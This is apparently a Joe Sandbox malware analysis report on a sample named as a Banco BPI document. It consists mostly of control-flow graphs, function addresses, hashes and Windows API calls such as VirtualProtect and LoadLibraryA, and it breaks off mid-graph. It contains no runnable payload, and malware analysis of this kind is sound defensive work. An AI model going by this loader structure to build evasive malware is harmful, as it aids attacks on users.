792->798 807 11dc7cd-11dc7d0 793->807 808 11dc7bc-11dc7cb 793->808 863 11dc7db call 11dcf78 794->863 864 11dc7db call 11dcf68 794->864 834 11dca29-11dca4f 795->834 835 11dca51-11dca75 795->835 796->747 810 11dc7f5-11dc805 796->810 806 11dcb71-11dcb74 798->806 809 11dc775-11dc784 800->809 801->809 804 11dc7e1 804->796 806->774 811 11dcb5b-11dcb5e 806->811 807->710 808->796 809->775 818 11dc901-11dc914 809->818 861 11dc807 call 11de9d0 810->861 862 11dc807 call 11de9c0 810->862 811->791 815 11dcb60-11dcb70 811->815 815->806 818->717 822 11dc80d-11dc810 822->710 830->831 834->835 851 11dcaa7-11dcac0 835->851 852 11dca77-11dca8e 835->852 855 11dcacb 851->855 856 11dcac2 851->856 858 11dca9a-11dcaa5 852->858 859 11dca90-11dca93 852->859 855->770 856->855 858->851 858->852 859->858 861->822 862->822 863->804 864->804 865->706 866->706 867->706
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @ Wl
                                                                                                                                                                                                        • API String ID: 0-870524705
                                                                                                                                                                                                        • Opcode ID: c4e244a38ada2f2fbd2c930dadbce51cb2771e0773afe46856319225542d0a56
                                                                                                                                                                                                        • Instruction ID: 1419f7b0f0f406403500e3615ed058f7c05619ff79bc6551080d00972f091721
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4e244a38ada2f2fbd2c930dadbce51cb2771e0773afe46856319225542d0a56
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 22127234B002098FDB18DF69C594AAEBBF6FF88614B158569E506EB361DF30DC42CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 011D07B0 Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 909 11d07b0-11d087e 910 11d088a-11d088c call 11d02e0 909->910 912 11d0891-11d0907 call 11d02ec call 11d02e0 call 11d02ec 910->912 927 11d091f-11d0937 912->927 928 11d0909-11d090f 912->928 970 11d093a call 11d0ec8 927->970 971 11d093a call 11d0ed0 927->971 929 11d0911 928->929 930 11d0913-11d0915 928->930 929->927 930->927 931 11d093c-11d0964 933 11d096b-11d097c 931->933 973 11d097f call 11d0ec8 933->973 974 11d097f call 11d0ed0 933->974 934 11d0981-11d098f call 11d02f8 938 11d0996-11d099e 934->938 939 11d09b7 938->939 940 11d09a0-11d09b5 938->940 941 11d09bc-11d09c2 939->941 940->939 940->940 942 11d09c7-11d09d1 941->942 943 11d0a88-11d0a9f 942->943 944 11d09d7-11d0a57 942->944 945 11d0b14-11d0b39 943->945 946 11d0aa1-11d0b12 943->946 967 11d0a5f-11d0a73 call 11d1429 944->967 952 11d0b3e-11d0b53 945->952 946->945 969 11d0a7d 967->969 969->943 970->931 971->931 973->934 974->934
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                        • String ID: ""
                                                                                                                                                                                                        • API String ID: 1029625771-2531496792
                                                                                                                                                                                                        • Opcode ID: d0ebfbe964e32205af759d482e39430dbca1aa221abbe89e540c406c615256df
                                                                                                                                                                                                        • Instruction ID: a3561174b4d36e3e5d97a940979b981773bd676d746429be7c6f12a39c919b5d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ebfbe964e32205af759d482e39430dbca1aa221abbe89e540c406c615256df
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7181A070B042088FDB48EB68D954B6EB7E2EBC8308F14C569D50ADB395DF359D42CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 011D0870 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 1060 11d0870-11d0907 call 11d02e0 call 11d02ec call 11d02e0 call 11d02ec 1078 11d091f-11d0937 1060->1078 1079 11d0909-11d090f 1060->1079 1121 11d093a call 11d0ec8 1078->1121 1122 11d093a call 11d0ed0 1078->1122 1080 11d0911 1079->1080 1081 11d0913-11d0915 1079->1081 1080->1078 1081->1078 1082 11d093c-11d097c 1124 11d097f call 11d0ec8 1082->1124 1125 11d097f call 11d0ed0 1082->1125 1085 11d0981-11d099e call 11d02f8 1090 11d09b7-11d09d1 1085->1090 1091 11d09a0-11d09b5 1085->1091 1094 11d0a88-11d0a9f 1090->1094 1095 11d09d7-11d0a73 call 11d1429 1090->1095 1091->1090 1091->1091 1096 11d0b14-11d0b39 1094->1096 1097 11d0aa1-11d0b12 1094->1097 1120 11d0a7d 1095->1120 1103 11d0b3e-11d0b53 1096->1103 1097->1096 1120->1094 1121->1082 1122->1082 1124->1085 1125->1085
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                        • String ID: ""
                                                                                                                                                                                                        • API String ID: 1029625771-2531496792
                                                                                                                                                                                                        • Opcode ID: 34ef4063ab45b671219d728b8fcc9dd5d56c53657d2d2660100490ce48e81bb4
                                                                                                                                                                                                        • Instruction ID: fd0128454e4c900d8e14e1257e6dd99bdf7b765f50253e0ab0d8917d0e68fb28
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34ef4063ab45b671219d728b8fcc9dd5d56c53657d2d2660100490ce48e81bb4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67818F70B042188FDB58EB68D954B6EB7E2EBC8308F14C529D50ADB395DF319D41CBA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 011D0BDC Relevance: 1.6, APIs: 1, Instructions: 102libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 868 11d0bdc-11d0c47 870 11d0c49-11d0c6e 868->870 871 11d0c9b-11d0ce7 LoadLibraryA 868->871 870->871 874 11d0c70-11d0c72 870->874 875 11d0ce9-11d0cef 871->875 876 11d0cf0-11d0d21 871->876 878 11d0c95-11d0c98 874->878 879 11d0c74-11d0c7e 874->879 875->876 881 11d0d31 876->881 882 11d0d23-11d0d27 876->882 878->871 883 11d0c80 879->883 884 11d0c82-11d0c91 879->884 887 11d0d32 881->887 882->881 885 11d0d29 882->885 883->884 884->884 886 11d0c93 884->886 885->881 886->878 887->887
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 011D0CD7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                                        • Opcode ID: 3d151f5294507b1c47b1b61e2df3247a5da04db4f507bd39903b5334078b32d7
                                                                                                                                                                                                        • Instruction ID: 95fb70d17afa671f2ed14398599ce9eb81db1c9517edf2e4e80cdc6e620045ec
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d151f5294507b1c47b1b61e2df3247a5da04db4f507bd39903b5334078b32d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D34145B0D007499FDB14CFA9D9857DEBBF1EB48714F14812AE815AB380D7B49886CF91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 011D02E0 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 888 11d02e0-11d0c47 891 11d0c49-11d0c6e 888->891 892 11d0c9b-11d0ce7 LoadLibraryA 888->892 891->892 895 11d0c70-11d0c72 891->895 896 11d0ce9-11d0cef 892->896 897 11d0cf0-11d0d21 892->897 899 11d0c95-11d0c98 895->899 900 11d0c74-11d0c7e 895->900 896->897 902 11d0d31 897->902 903 11d0d23-11d0d27 897->903 899->892 904 11d0c80 900->904 905 11d0c82-11d0c91 900->905 908 11d0d32 902->908 903->902 906 11d0d29 903->906 904->905 905->905 907 11d0c93 905->907 906->902 907->899 908->908
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 011D0CD7
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                                        • Opcode ID: 550824fe46bd9d04127f99c4db28daefb1f2af495c4474d7ae6ec56b82add60e
                                                                                                                                                                                                        • Instruction ID: 297f659a3825e6e3a83a2d1e7a9e7663691aa28a3c5b2ca3d7f24fb246a2c257
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 550824fe46bd9d04127f99c4db28daefb1f2af495c4474d7ae6ec56b82add60e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB4147B0D007599FDB18CFA9C98579EBBF1EB48714F14812AE815AB380D7B4A845CF91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 011D0EC8 Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 975 11d0ec8-11d0f51 VirtualProtect 978 11d0f5a-11d0f7f 975->978 979 11d0f53-11d0f59 975->979 979->978
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 011D0F44
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                        • Opcode ID: 0f6aac76ade4bc864e3c1af54a55187b85d5116370f2c46e5da4ee75bf8c8fd2
                                                                                                                                                                                                        • Instruction ID: 8d5884c45ce101a98e6d5b23db2a515aba6f075b0b3ac00aa1dcf8060277046d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f6aac76ade4bc864e3c1af54a55187b85d5116370f2c46e5da4ee75bf8c8fd2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9F2133B19042498BCB10CFAAC884BEEFBF4FF48324F14842EE919A7240C7749945CFA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 011D0ED0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 983 11d0ed0-11d0f51 VirtualProtect 986 11d0f5a-11d0f7f 983->986 987 11d0f53-11d0f59 983->987 987->986
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 011D0F44
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                                                        • Opcode ID: b5ef6cc206e76484710b5a70146fcb65755be54b01eb6c05f04ef373c3d24e85
                                                                                                                                                                                                        • Instruction ID: c957f9062b9aec62c48c87788ca7d46f3ea32d099a2499b40110a6293d90364d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5ef6cc206e76484710b5a70146fcb65755be54b01eb6c05f04ef373c3d24e85
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E11F2B19043499BCB10DFAAC984BEEFBF4BF48324F14842AE519A7240C775A945CFA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 011DEF20 Relevance: .5, Instructions: 503COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.308875011.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_11d0000_Document de bancobpi_66473474.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2c14414d60b178977db826717dbd44cd2c7b3881bb00dc514448f5c8838dd739
                                                                                                                                                                                                        • Instruction ID: a873e665f160536388f7eefe42ebb7f7d07af9ab321207668d635902a3fbc21a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c14414d60b178977db826717dbd44cd2c7b3881bb00dc514448f5c8838dd739
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3912D331A0424A9FCB19DF68D580AAEBBF2BF88314F158569E505EB351DB30ED47CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:4.1%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:3.8%
                                                                                                                                                                                                        Signature Coverage:6.6%
                                                                                                                                                                                                        Total number of Nodes:425
                                                                                                                                                                                                        Total number of Limit Nodes:58
                                                                                                                                                                                                        execution_graph 32079 4a09540 LdrInitializeThunk 32081 41f270 32082 41f27b 32081->32082 32084 41b9d0 32081->32084 32085 41b9f6 32084->32085 32096 409160 32085->32096 32087 41ba02 32088 41ba49 32087->32088 32102 40d770 32087->32102 32088->32082 32090 41ba17 32091 41ba2c 32090->32091 32144 41a660 32090->32144 32112 40ac10 32091->32112 32094 41ba3b 32095 41a660 ExitProcess 32094->32095 32095->32088 32099 40916d 32096->32099 32147 4090b0 32096->32147 32098 409174 32098->32087 32099->32098 32154 40d570 32099->32154 32103 40d79c 32102->32103 32402 40d680 32103->32402 32106 40d7c9 32108 41a440 NtClose 32106->32108 32109 40d7d4 32106->32109 32107 40d7e1 32110 41a440 NtClose 32107->32110 32111 40d7f2 32107->32111 32108->32109 32109->32090 32110->32111 32111->32090 32114 40ac35 32112->32114 32113 40af03 32113->32094 32114->32113 32413 414ff0 32114->32413 32116 40acf7 32116->32113 32416 407e10 32116->32416 32118 40ad3b 32118->32113 32433 41a4b0 32118->32433 32122 40ad91 32123 40ad98 32122->32123 32444 419fc0 32122->32444 32124 41bee0 RtlFreeHeap 32123->32124 32126 40ada5 32124->32126 32126->32094 32128 40ade2 32129 41bee0 RtlFreeHeap 32128->32129 32130 40ade9 32129->32130 32130->32094 32131 40adf2 32132 40d800 2 API calls 32131->32132 32133 40ae66 32132->32133 32133->32123 32134 40ae71 32133->32134 32135 41bee0 RtlFreeHeap 32134->32135 32136 40ae95 32135->32136 32448 41a010 32136->32448 32139 419fc0 LdrInitializeThunk 32140 40aed0 32139->32140 32140->32113 32452 419dd0 32140->32452 32143 41a660 ExitProcess 32143->32113 32145 41a67f ExitProcess 32144->32145 32146 41af60 32144->32146 32146->32145 32149 4090c3 32147->32149 32148 4090d6 32148->32099 32149->32148 32162 41b310 32149->32162 32151 409113 32151->32148 32173 408ed0 32151->32173 32153 409133 32153->32099 32155 40d589 32154->32155 32156 409185 32155->32156 32394 41a780 32155->32394 32156->32087 32158 40d5c2 32159 40d5ed 32158->32159 32397 41a210 32158->32397 32161 41a440 NtClose 32159->32161 32161->32156 32163 41b329 32162->32163 32179 4156a0 32163->32179 32165 41b341 32166 41b34a 32165->32166 32208 41b150 32165->32208 32166->32151 32168 41b35e 32168->32166 32221 419eb0 32168->32221 32373 407210 32173->32373 32175 408ef1 32175->32153 32176 408eea 32176->32175 32386 4074d0 32176->32386 32180 4156b4 32179->32180 32182 4157c3 32179->32182 32180->32182 32228 41a310 32180->32228 32182->32165 32183 415807 32184 41bee0 RtlFreeHeap 32183->32184 32190 415813 32184->32190 32185 415999 32187 41a440 NtClose 32185->32187 32186 4159af 32278 4153e0 NtReadFile NtClose 32186->32278 32188 4159a0 32187->32188 32188->32165 32190->32182 32190->32185 32190->32186 32192 4158a2 32190->32192 32191 4159c2 32191->32165 32193 415909 32192->32193 32194 4158b1 32192->32194 32193->32185 32200 41591c 32193->32200 32195 4158b6 32194->32195 32196 4158ca 32194->32196 32274 4152a0 NtClose LdrInitializeThunk LdrInitializeThunk 32195->32274 32198 4158e7 32196->32198 32199 4158cf 32196->32199 32198->32188 32241 415060 32198->32241 32231 415340 32199->32231 32275 41a440 32200->32275 32201 4158c0 32201->32165 32203 4158dd 32203->32165 32205 4158ff 32205->32165 32207 415988 32207->32165 32209 41b16b 32208->32209 32210 41b17d 32209->32210 32298 41be60 32209->32298 32210->32168 32212 41b19d 32301 414cc0 32212->32301 32214 41b1c0 32214->32210 32215 414cc0 2 API calls 32214->32215 32217 41b1e2 32215->32217 32217->32210 32333 415fe0 32217->32333 32218 41b26a 32344 419e70 32218->32344 32222 419ecc 32221->32222 32367 4a0967a 32222->32367 32223 419ee7 32225 41bee0 32223->32225 32370 41a620 32225->32370 32227 41b3b9 32227->32151 32229 41a32c NtCreateFile 32228->32229 32279 41af60 32228->32279 32229->32183 32232 41535c 32231->32232 32233 415384 32232->32233 32234 415398 32232->32234 32235 41a440 NtClose 32233->32235 32236 41a440 NtClose 32234->32236 32237 41538d 32235->32237 32238 4153a1 32236->32238 32237->32203 32281 41c0f0 32238->32281 32240 4153ac 32240->32203 32242 415061 32241->32242 32243 4150ab 32242->32243 32244 4150de 32242->32244 32246 41a440 NtClose 32243->32246 32245 4150fa 32244->32245 32248 415229 32244->32248 32249 415131 32245->32249 32250 41511c 32245->32250 32247 4150cf 32246->32247 32247->32205 32254 41a440 NtClose 32248->32254 32252 415136 32249->32252 32253 41514c 32249->32253 32251 41a440 NtClose 32250->32251 32255 415125 32251->32255 32256 41a440 NtClose 32252->32256 32261 415151 32253->32261 32287 41c0b0 32253->32287 32257 415289 32254->32257 32255->32205 32258 41513f 32256->32258 32257->32205 32258->32205 32268 415163 32261->32268 32290 41a3c0 32261->32290 32262 4151b7 32263 4151d5 32262->32263 32264 4151ea 32262->32264 32266 41a440 NtClose 32263->32266 32265 41a440 NtClose 32264->32265 32267 4151f3 32265->32267 32266->32268 32269 41521f 32267->32269 32293 41bcb0 32267->32293 32268->32205 32269->32205 32271 41520a 32272 41bee0 RtlFreeHeap 32271->32272 32273 415213 32272->32273 32273->32205 32274->32201 32276 41af60 32275->32276 32277 41a45c NtClose 32276->32277 32277->32207 32278->32191 32280 41af6f 32279->32280 32280->32229 32284 41a5e0 32281->32284 32283 41c10a 32283->32240 32285 41af60 32284->32285 32286 41a5fc RtlAllocateHeap 32285->32286 32286->32283 32288 41a5e0 RtlAllocateHeap 32287->32288 32289 41c0c8 32288->32289 32289->32261 32291 41af60 32290->32291 32292 41a3dc NtReadFile 32291->32292 32292->32262 32294 41bcd4 32293->32294 32295 41bcbd 32293->32295 32294->32271 32295->32294 32296 41c0b0 RtlAllocateHeap 32295->32296 32297 41bceb 32296->32297 32297->32271 32299 41be8d 32298->32299 32348 41a4f0 32298->32348 32299->32212 32302 414cd1 32301->32302 32303 414cd9 32301->32303 32302->32214 32332 414fac 32303->32332 32351 41d090 32303->32351 32305 414d2d 32306 41d090 RtlAllocateHeap 32305->32306 32309 414d38 32306->32309 32307 414d86 32310 41d090 RtlAllocateHeap 32307->32310 32309->32307 32311 41d1c0 2 API calls 32309->32311 32365 41d130 RtlAllocateHeap RtlFreeHeap 32309->32365 32313 414d9a 32310->32313 32311->32309 32312 414df7 32314 41d090 RtlAllocateHeap 32312->32314 32313->32312 32356 41d1c0 32313->32356 32316 414e0d 32314->32316 32317 414e4a 32316->32317 32320 41d1c0 2 API calls 32316->32320 32318 41d090 RtlAllocateHeap 32317->32318 32319 414e55 32318->32319 32321 414e8f 32319->32321 32322 41d1c0 2 API calls 32319->32322 32320->32316 32362 41d0f0 32321->32362 32322->32319 32325 41d0f0 RtlFreeHeap 32326 414f8e 32325->32326 32327 41d0f0 RtlFreeHeap 32326->32327 32328 414f98 32327->32328 32329 41d0f0 RtlFreeHeap 32328->32329 32330 414fa2 32329->32330 32331 41d0f0 RtlFreeHeap 32330->32331 32331->32332 32332->32214 32334 415ff1 32333->32334 32335 4156a0 7 API calls 32334->32335 32340 416007 32335->32340 32336 416010 32336->32218 32337 416047 32338 41bee0 RtlFreeHeap 32337->32338 32339 416058 32338->32339 32339->32218 32340->32336 32340->32337 32341 416093 32340->32341 32342 41bee0 RtlFreeHeap 32341->32342 32343 416098 32342->32343 32343->32218 32345 419e8c 32344->32345 32366 4a09860 LdrInitializeThunk 32345->32366 32346 419ea3 32346->32168 32349 41af60 32348->32349 32350 41a50c NtAllocateVirtualMemory 32349->32350 32350->32299 32352 41d0a0 32351->32352 32353 41d0a6 32351->32353 32352->32305 32354 41c0b0 RtlAllocateHeap 32353->32354 32355 41d0cc 32354->32355 32355->32305 32357 41d130 32356->32357 32358 41c0b0 RtlAllocateHeap 32357->32358 32359 41d18d 32357->32359 32360 41d16a 32358->32360 32359->32313 32361 41bee0 RtlFreeHeap 32360->32361 32361->32359 32363 414f84 32362->32363 32364 41bee0 RtlFreeHeap 32362->32364 32363->32325 32364->32363 32365->32309 32366->32346 32368 4a09681 32367->32368 32369 4a0968f LdrInitializeThunk 32367->32369 32368->32223 32369->32223 32371 41af60 32370->32371 32372 41a63c RtlFreeHeap 32371->32372 32372->32227 32374 407220 32373->32374 32375 40721b 32373->32375 32376 41be60 NtAllocateVirtualMemory 32374->32376 32375->32176 32379 407245 32376->32379 32377 4072a8 32377->32176 32378 419e70 LdrInitializeThunk 32378->32379 32379->32377 32379->32378 32380 4072ae 32379->32380 32385 41be60 NtAllocateVirtualMemory 32379->32385 32389 41a570 32379->32389 32381 4072d4 32380->32381 32383 41a570 LdrInitializeThunk 32380->32383 32381->32176 32384 4072c5 32383->32384 32384->32176 32385->32379 32387 4074ee 32386->32387 32388 41a570 LdrInitializeThunk 32386->32388 32387->32153 32388->32387 32390 41a58c 32389->32390 32393 4a096e0 LdrInitializeThunk 32390->32393 32391 41a5a3 32391->32379 32393->32391 32395 41a79f LookupPrivilegeValueW 32394->32395 32396 41af60 32394->32396 32395->32158 32396->32395 32398 41a22c 32397->32398 32401 4a09910 LdrInitializeThunk 32398->32401 32399 41a24b 32399->32159 32401->32399 32403 40d69a 32402->32403 32407 40d750 32402->32407 32408 419f30 32403->32408 32406 41a440 NtClose 32406->32407 32407->32106 32407->32107 32409 419f4c 32408->32409 32412 4a09fe0 LdrInitializeThunk 32409->32412 32410 40d744 32410->32406 32412->32410 32414 40d800 2 API calls 32413->32414 32415 415016 32414->32415 32415->32116 32417 407e2e 32416->32417 32419 407edc 32416->32419 32418 407210 3 API calls 32417->32418 32421 407e38 32418->32421 32422 407210 3 API calls 32419->32422 32424 407fba 32419->32424 32432 407f9c 32419->32432 32421->32419 32427 407ed2 32421->32427 32456 407b10 32421->32456 32428 407efd 32422->32428 32423 407fb0 32423->32118 32424->32118 32426 407b10 16 API calls 32426->32428 32429 4074d0 LdrInitializeThunk 32427->32429 32428->32426 32430 407f92 32428->32430 32428->32432 32429->32419 32431 4074d0 LdrInitializeThunk 32430->32431 32431->32432 32432->32424 32481 40da70 9 API calls 32432->32481 32434 41a4cc 32433->32434 32592 4a098f0 LdrInitializeThunk 32434->32592 32435 40ad72 32437 40d800 32435->32437 32438 40d81d 32437->32438 32593 419f70 32438->32593 32441 40d865 32441->32122 32442 419fc0 LdrInitializeThunk 32443 40d88e 32442->32443 32443->32122 32445 419fc3 32444->32445 32598 4a09780 LdrInitializeThunk 32445->32598 32446 40add5 32446->32128 32446->32131 32449 41a02c 32448->32449 32599 4a097a0 LdrInitializeThunk 32449->32599 32450 40aea9 32450->32139 32453 419dec 32452->32453 32600 4a09a20 LdrInitializeThunk 32453->32600 32454 40aefc 32454->32143 32457 407b35 32456->32457 32457->32421 32458 407b89 32457->32458 32459 407c0a 32457->32459 32460 419eb0 LdrInitializeThunk 32457->32460 32458->32421 32514 40d950 NtClose 32459->32514 32461 407bad 32460->32461 32461->32459 32463 407bb8 32461->32463 32465 407c36 32463->32465 32482 40af10 32463->32482 32464 407c25 32467 407c2c 32464->32467 32470 407c42 32464->32470 32465->32421 32469 41a440 NtClose 32467->32469 32468 407bd2 32468->32465 32502 407940 32468->32502 32469->32465 32472 40af10 4 API calls 32470->32472 32474 407c8d 32472->32474 32474->32465 32475 419dd0 LdrInitializeThunk 32474->32475 32476 407cdb 32475->32476 32477 41a440 NtClose 32476->32477 32478 407ce5 32477->32478 32515 407710 32478->32515 32480 407cf9 32480->32421 32481->32423 32484 40af3b 32482->32484 32483 40d800 2 API calls 32485 40af9a 32483->32485 32484->32483 32486 40afe3 32485->32486 32487 419fc0 LdrInitializeThunk 32485->32487 32486->32468 32488 40afc5 32487->32488 32489 40afcc 32488->32489 32492 40afef 32488->32492 32490 41a010 LdrInitializeThunk 32489->32490 32491 40afd9 32490->32491 32493 41a440 NtClose 32491->32493 32494 40b059 32492->32494 32495 40b039 32492->32495 32493->32486 32497 41a010 LdrInitializeThunk 32494->32497 32496 41a440 NtClose 32495->32496 32498 40b046 32496->32498 32499 40b06b 32497->32499 32498->32468 32500 41a440 NtClose 32499->32500 32501 40b075 32500->32501 32501->32468 32503 407956 32502->32503 32527 419830 32503->32527 32505 40796f 32510 407ae1 32505->32510 32548 407510 32505->32548 32507 407a55 32508 407710 10 API calls 32507->32508 32507->32510 32509 407a83 32508->32509 32509->32510 32511 419eb0 LdrInitializeThunk 32509->32511 32510->32421 32512 407ab8 32511->32512 32512->32510 32513 41a4b0 LdrInitializeThunk 32512->32513 32513->32510 32514->32464 32516 407739 32515->32516 32579 407680 32516->32579 32519 41a4b0 LdrInitializeThunk 32520 40774c 32519->32520 32520->32519 32521 4077d7 32520->32521 32523 4077d2 32520->32523 32583 40d9d0 32520->32583 32521->32480 32522 41a440 NtClose 32524 40780a 32522->32524 32523->32522 32524->32521 32525 4156a0 7 API calls 32524->32525 32526 407928 32525->32526 32526->32480 32528 41c0b0 RtlAllocateHeap 32527->32528 32529 419847 32528->32529 32555 408760 32529->32555 32531 419862 32532 4198a0 32531->32532 32533 419889 32531->32533 32536 41be60 NtAllocateVirtualMemory 32532->32536 32534 41bee0 RtlFreeHeap 32533->32534 32535 419896 32534->32535 32535->32505 32537 